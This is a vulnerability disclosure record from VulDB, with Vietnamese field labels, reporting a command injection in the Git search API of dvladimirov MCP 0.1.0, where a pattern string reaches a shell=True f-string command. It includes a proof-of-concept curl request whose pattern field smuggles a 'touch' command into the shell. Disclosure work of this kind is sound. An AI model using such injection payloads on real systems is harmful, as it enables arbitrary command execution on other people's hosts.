| tiêu đề | dvladimirov mcp 0.1.0 Command Injection |
|---|
| Mô tả | The Git search API accepts a caller-controlled pattern string and passes it into a shell command built with Python f-string interpolation. Because the command is executed with shell=True, shell metacharacters in pattern break out of the intended grep invocation and execute arbitrary host commands.
curl -s -X POST 'http://HOST:PORT/v1/models/git-analyzer/search' \
-H 'Content-Type: application/json' \
-d '{
"repo_url": "https://github.com/octocat/Hello-World.git",
"pattern": "\"; touch /tmp/dvladimirov_mcp_cmdi; #"
}' |
|---|
| Nguồn | ⚠️ https://github.com/dvladimirov/MCP/issues/2 |
|---|
| Người dùng | SmallW (UID 97245) |
|---|
| Đệ trình | 10/04/2026 14:57 (cách đây 2 các tháng) |
|---|
| Kiểm duyệt | 27/04/2026 17:01 (17 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 359807 [dvladimirov MCP đến 0.1.0 Git Search API mcp_server.py GitSearchRequest repo_url/pattern nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|